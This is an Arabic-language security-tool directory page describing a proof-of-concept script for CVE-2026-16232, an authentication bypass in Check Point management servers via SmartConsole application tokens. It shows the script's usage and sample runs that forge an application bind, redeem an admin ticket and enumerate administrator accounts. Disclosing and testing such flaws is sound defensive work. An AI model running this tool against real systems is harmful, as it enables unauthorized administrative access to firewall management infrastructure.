Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-16232 — نص برمجي لإثبات المفهوم لاستغلال CVE-2026-16232، وهو تجاوز للمصادقة عبر عملية تسجيل الدخول إلى SmartConsole باستخدام رمز التطبيق. | Kitploit
أدوات/GitHubGitHub/sfewer-r7/cve-2026-16232
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاختبار الاختراق
GitHubsfewer-r7/cve-2026-16232

CVE-2026-16232

نص برمجي لإثبات المفهوم لاستغلال CVE-2026-16232، وهو تجاوز للمصادقة عبر عملية تسجيل الدخول إلى SmartConsole باستخدام رمز التطبيق.

عرض المستودع
117منذ 23 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-16232

نظرة عامة

نص برمجي لإثبات المفهوم لاستغلال CVE-2026-16232، وهو تجاوز للمصادقة عبر عملية تسجيل الدخول إلى SmartConsole باستخدام رمز تطبيق (application token). يؤثر هذا الثغرة على Check Point Security Management Server و Multi-Domain Security Management Server (MDS).

للحصول على تحليل تقني كامل، راجع تحليل Rapid7.

الاستخدام

root@kitploit:~
$ python3 CVE-2026-16232.py --help
usage: CVE-2026-16232.py [-h] --target TARGET [--fwm-port FWM_PORT] [--cpm-port CPM_PORT] [--timeout TIMEOUT]

Demonstrate CVE-2026-16232 by forging an application bind and redeeming a SmartConsole admin ticket.

options:
  -h, --help           show this help message and exit
  --target TARGET      management server hostname or IP
  --fwm-port FWM_PORT  SIC/CPMI port (default: 18190)
  --cpm-port CPM_PORT  CPM SOAP port (default: 19009)
  --timeout TIMEOUT    network timeout in seconds (default: 10)

أمثلة

يُظهر تشغيل الـ PoC ضد هدف ضعيف أن تجاوز المصادقة يعمل.

root@kitploit:~
$ python3 CVE-2026-16232.py --target 192.168.86.15
===============================================================================================
Rapid7 Labs - Check Point authentication bypass via SmartConsole login process (CVE-2026-16232)
===============================================================================================
[+] Targeting: 192.168.86.15
[+] SIC/CPMI connected
[+] Forged application DN: cn=cp_mgmt,o=gw-5622ca..5otbwa
[+] Application bind succeeded
[+] Application token obtained: XYB8PbLoXXnMx4J7W43UK-BhrjWkolvihp0P98G2qDc
[+] getServerInfo
    hostName: gw-5622ca
    hostIpAddress: 192.168.86.15
    osName: Linux
    osVersion: 3.10.0-1160.15.2cpx86_64
[+] Application token GetAllAdmins count: 0
[+] SmartConsole application-token ticket redeemed: 31bd621cc8855634fd97484fec258a18eb14eb8feb14b22c260a4accba715808
[+] GetAllAdmins count: 6
    admin: UNIX_PASSWORD
    Remote CPM Server_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD
    upgrade_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD
    admin_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD
    SmartView Reporter Client_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD
    CPM Server_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD

يُظهر تشغيل الـ PoC ضد هدف مُصحح فشل طلب ربط التطبيق الخبيث.

root@kitploit:~
$ python3 CVE-2026-16232.py --target 192.168.86.16
===============================================================================================
Rapid7 Labs - Check Point authentication bypass via SmartConsole login process (CVE-2026-16232)
===============================================================================================
[+] Targeting: 192.168.86.16
[+] SIC/CPMI connected
[+] Forged application DN: cn=cp_mgmt,o=gw-5622cc..tmbpin
[-] Application bind failed. The target is likely patched and not vulnerable.
تنزيل الأداة